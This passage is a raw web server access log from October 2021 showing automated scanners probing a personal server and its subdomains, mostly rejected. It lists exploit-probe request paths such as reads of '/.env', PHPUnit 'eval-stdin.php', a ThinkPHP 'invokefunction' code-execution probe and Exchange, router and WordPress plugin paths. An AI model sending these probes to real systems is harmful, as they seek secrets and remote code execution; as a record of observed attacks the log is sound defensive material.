109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:39 +0000] 444 - GET https stg.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:39 +0000] 444 - GET https panel.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:00:13:39 +0000] 444 - GET https stage.moralanimal.net "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:01:12:40 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [11/Oct/2021:01:14:19 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [11/Oct/2021:01:17:33 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.204.185] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Oct/2021:01:28:57 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.205.145] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Oct/2021:01:29:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.78.54.242] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "-" [11/Oct/2021:01:43:01 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Oct/2021:01:43:01 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Oct/2021:01:43:04 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Oct/2021:01:43:04 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Oct/2021:01:43:06 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [11/Oct/2021:01:43:06 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Oct/2021:01:43:08 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Oct/2021:01:43:09 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Oct/2021:01:43:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Oct/2021:01:43:14 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Oct/2021:01:43:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Oct/2021:01:43:16 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [11/Oct/2021:01:43:19 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Oct/2021:02:22:18 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [11/Oct/2021:02:40:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Oct/2021:02:46:10 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:02:46:10 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:03:01:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [11/Oct/2021:04:18:49 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 134.209.204.71] [Length 0] [Gzip -] "curl/7.3.2" "-" [11/Oct/2021:04:20:00 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 124.126.78.150] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; LG G2 Build/170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [11/Oct/2021:04:31:16 +0000] 444 - GET https router.moralanimal.net "/" [Client 218.17.86.56] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0; OPPO x20 70816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "-" [11/Oct/2021:04:55:01 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.204.110] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Oct/2021:04:55:14 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.205.35] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Oct/2021:04:55:54 +0000] 444 - GET https pop.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [11/Oct/2021:04:58:04 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Oct/2021:05:22:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.116] [Length 0] [Gzip -] "-" "-" [11/Oct/2021:05:22:30 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.116] [Length 252] [Gzip -] "-" "-" [11/Oct/2021:05:22:30 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [11/Oct/2021:06:29:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [11/Oct/2021:07:07:33 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [11/Oct/2021:07:19:59 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.199.196] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Oct/2021:07:34:44 +0000] 444 - GET https localhost "/" [Client 125.64.94.136] [Length 0] [Gzip -] "-" "-" [11/Oct/2021:07:34:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.136] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [11/Oct/2021:07:34:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.136] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [11/Oct/2021:08:53:10 +0000] 444 - GET https localhost "/favicon.ico" [Client 109.248.6.247] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [11/Oct/2021:08:58:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Oct/2021:10:04:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 147.182.153.107] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.52" "-" [11/Oct/2021:10:34:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.204.16] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Oct/2021:10:57:40 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 194.127.178.156] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Oct/2021:11:03:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.59.1] [Length 0] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" [11/Oct/2021:11:06:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Oct/2021:12:56:40 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.206.168] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Oct/2021:14:14:27 +0000] 400 - - http localhost "-" [Client 87.251.75.63] [Length 154] [Gzip -] "-" "-" [11/Oct/2021:14:42:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [11/Oct/2021:16:00:04 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [11/Oct/2021:16:26:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Oct/2021:17:02:53 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Oct/2021:17:02:53 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Oct/2021:17:02:53 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Oct/2021:17:02:53 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Oct/2021:17:02:53 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Oct/2021:17:02:53 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Oct/2021:19:12:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.237.101.15] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11" "-" [11/Oct/2021:19:12:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.237.101.15] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11" "-" [11/Oct/2021:19:41:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Oct/2021:20:05:26 +0000] 444 - GET https imap.moralanimal.net "/" [Client 34.77.162.11] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [11/Oct/2021:20:19:34 +0000] 400 - GET http localhost "/ab2g" [Client 104.248.59.4] [Length 154] [Gzip -] "-" "-" [11/Oct/2021:20:19:34 +0000] 400 - GET http localhost "/ab2h" [Client 104.248.59.4] [Length 154] [Gzip -] "-" "-" [11/Oct/2021:20:28:41 +0000] 400 - GET http localhost "/" [Client 47.98.110.115] [Length 154] [Gzip -] "-" "-" [11/Oct/2021:21:02:04 +0000] 444 - GET https router.moralanimal.net "/" [Client 92.118.160.61] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [11/Oct/2021:21:17:37 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [11/Oct/2021:22:07:46 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [11/Oct/2021:22:42:40 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1" "-" [11/Oct/2021:22:42:40 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (X11; FreeBSD i386) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2" "-" [11/Oct/2021:22:42:41 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [11/Oct/2021:22:47:29 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [12/Oct/2021:00:02:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.207.84] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Oct/2021:00:10:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Oct/2021:00:21:42 +0000] 444 - GET https pop.moralanimal.net "/" [Client 124.126.78.178] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; VIVO find 816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "-" [12/Oct/2021:00:23:45 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:00:23:45 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:00:23:47 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [12/Oct/2021:00:23:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:00:23:50 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:00:23:50 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:00:23:50 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:00:23:51 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:00:23:51 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:00:23:52 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:00:23:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:00:23:53 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:00:23:53 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [12/Oct/2021:01:16:04 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.206.177] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Oct/2021:02:01:15 +0000] 400 - OPTIONS http 64.22.31.253 "/" [Client 181.214.206.72] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "-" [12/Oct/2021:02:28:59 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [12/Oct/2021:04:13:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.66.88.100] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [12/Oct/2021:04:28:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Oct/2021:04:38:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [12/Oct/2021:04:51:10 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [12/Oct/2021:04:52:50 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Oct/2021:04:54:33 +0000] 400 - GET http localhost "/" [Client 157.230.104.42] [Length 252] [Gzip -] "-" "-" [12/Oct/2021:04:55:30 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.112.26] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Oct/2021:04:55:57 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.111.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Oct/2021:05:33:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.43] [Length 0] [Gzip -] "-" "-" [12/Oct/2021:05:33:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.43] [Length 252] [Gzip -] "-" "-" [12/Oct/2021:05:33:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [12/Oct/2021:06:11:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.138] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [12/Oct/2021:06:11:17 +0000] 400 - - https localhost "-" [Client 23.129.64.155] [Length 154] [Gzip -] "-" "-" [12/Oct/2021:06:11:20 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.155] [Length 0] [Gzip -] "-" "-" [12/Oct/2021:06:11:22 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.155] [Length 0] [Gzip -] "-" "-" [12/Oct/2021:06:11:30 +0000] 400 - - https localhost "-" [Client 23.129.64.147] [Length 154] [Gzip -] "-" "-" [12/Oct/2021:06:53:02 +0000] 444 - GET https agent.moralanimal.net "/" [Client 34.96.130.23] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [12/Oct/2021:07:11:12 +0000] 400 - - https localhost "-" [Client 35.212.218.163] [Length 0] [Gzip -] "-" "-" [12/Oct/2021:07:12:09 +0000] 400 - - https localhost "-" [Client 35.219.183.9] [Length 0] [Gzip -] "-" "-" [12/Oct/2021:07:12:22 +0000] 400 - - https localhost "-" [Client 35.219.183.9] [Length 0] [Gzip -] "-" "-" [12/Oct/2021:07:20:06 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.206.202] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Oct/2021:07:23:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Oct/2021:10:37:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.204.146] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Oct/2021:11:34:00 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 34.86.35.1] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [12/Oct/2021:11:38:02 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [12/Oct/2021:11:58:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.18] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [12/Oct/2021:12:56:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.200.33] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Oct/2021:13:22:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.161.29] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [12/Oct/2021:13:44:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Oct/2021:14:17:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 165.232.77.215] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [12/Oct/2021:15:21:12 +0000] 400 - - http localhost "-" [Client 89.248.165.23] [Length 154] [Gzip -] "-" "-" [12/Oct/2021:15:58:46 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; 